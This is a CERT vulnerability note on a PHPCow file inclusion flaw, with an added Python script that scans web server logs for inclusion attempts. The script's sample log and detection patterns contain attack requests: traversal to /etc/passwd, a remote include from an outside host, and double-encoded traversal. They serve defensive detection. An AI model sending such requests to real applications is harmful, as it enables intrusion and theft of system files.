
CERT Coordination Center

PHPCow file inclusion vulnerability

Vulnerability Note VU#515417

Original Release Date: 2008-11-19 | Last Revised: 2008-11-19

Overview

Older versions of PHPCow contain a file inclusion vulnerability that could allow an attacker to take control of a vulnerable application.

Description

PHPCow is a content management system written in PHP. Older versions of PHPCow contain a file inclusion vulnerability. We are aware of reports that this issue is being actively exploited.

Impact

A remote attacker may be able to take control of a vulnerable PHPCow application.

Solution

Upgrade

It is not clear which versions of PHPCow are vulnerable. The PHPCow support team has reported that recent versions of PHPCow addressed this issue. Contact PHPCow for more information about obtaining updated software.


Workarounds for administrators

    • Administrators are encouraged to periodically check their web server log files for indications (such as malformed URLs) that their web applications have been compromised.
    • Web application firewalls and reverse proxy servers may be able to block some known attacks.
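The log review recommended above can be scripted. The following is an added example, not code from the CERT note or from PHPCow: it scans Combined Log Format access log lines (the format written by Apache and nginx) for the generic indicators of local or remote file inclusion attempts, such as directory traversal, remote URLs and PHP stream wrappers in query parameters, and reports the offending source addresses. The `page` parameter and the sample log lines are constructed for the illustration; the indicators are generic and not specific to PHPCow. The same patterns are the kind a web application firewall rule would match to block the requests the second bullet refers to.

```python
"""Scan web server access logs for indicators of file inclusion attempts.

Added example (not part of the CERT note or of PHPCow). Assumes Combined
Log Format lines; the "page" query parameter in the sample log is a
hypothetical name, and the indicator list is generic, not PHPCow-specific.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Indicators checked against each fully decoded query parameter value.
INDICATORS = {
    "traversal": re.compile(r"(^|[\\/])\.\.([\\/]|$)"),       # ../ or ..\
    "remote_url": re.compile(r"^(https?|ftp)://", re.I),       # remote include
    "php_wrapper": re.compile(r"^(php|data|expect|phar|zip)://", re.I),
    "null_byte": re.compile(r"\x00"),                          # %00 truncation
    "sensitive_path": re.compile(r"/(etc/passwd|proc/self/environ|var/log)", re.I),
}

# Constructed sample log; addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Nov/2008:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Nov/2008:10:01:05 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1830 "-" "curl/7.19"
198.51.100.7 - - [19/Nov/2008:10:01:09 +0000] "GET /index.php?page=http://203.0.113.5/x.txt HTTP/1.1" 200 410 "-" "curl/7.19"
203.0.113.9 - - [19/Nov/2008:10:02:11 +0000] "GET /index.php?page=%252e%252e/%252e%252e/config.php HTTP/1.1" 404 220 "-" "Mozilla/5.0"
192.0.2.11 - - [19/Nov/2008:10:03:00 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> '.') so that
    double-encoded traversal sequences are not missed."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def inspect_request_path(path):
    """Return a list of (parameter, indicator) hits for one request target."""
    hits = []
    parts = urlsplit(path)
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_fully(raw)
        for label, rx in INDICATORS.items():
            if rx.search(value):
                hits.append((name, label))
    return hits


def scan_log(lines):
    """Parse each log line and collect the requests that carry an indicator.
    A 200 response to such a request deserves the closest look, but non-200
    responses are kept too, since they show who is probing."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        hits = inspect_request_path(m.group("path"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "path": m.group("path"),
                "hits": hits,
            })
    return findings


def suspicious_ips(findings):
    """Count flagged requests per source address, for blocking or follow-up."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG.splitlines())
    for f in results:
        print(f["ip"], f["status"], f["hits"], f["path"])
    print("per-source counts:", suspicious_ips(results))
```

Run it against a real log with `scan_log(open("access.log"))`. Decoding the value more than once matters: the fourth sample line hides `../../` behind double percent-encoding, which a single decode would leave as `%2e%2e`. Treat a hit with a 200 status on a parameter the application uses for includes as a possible compromise, not just a probe, and review what the server did next from that address.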

Workarounds for users

    • Following the recommendations in the Securing Your Web Browser document will mitigate many attacks that an attacker may launch after taking over a web application.

Vendor Information


PHPCow, LLC

Updated:  November 19, 2008

Status

  Vulnerable

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

It is not clear which versions of PHPCow are vulnerable. See http://www.phpcow.com/?c=131 for more information.

If you have feedback, comments, or additional information about this vulnerability, please send us email.


CVSS Metrics

Group          Score   Vector
Base           N/A     N/A
Temporal       N/A     N/A
Environmental  N/A

References

Acknowledgements

This document was written by Ryan Giobbi.

Other Information

CVE IDs: None
Severity Metric: 1.35
Date Public: 2008-11-19
Date First Published: 2008-11-19
Date Last Updated: 2008-11-19 16:35 UTC
Document Revision: 26

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.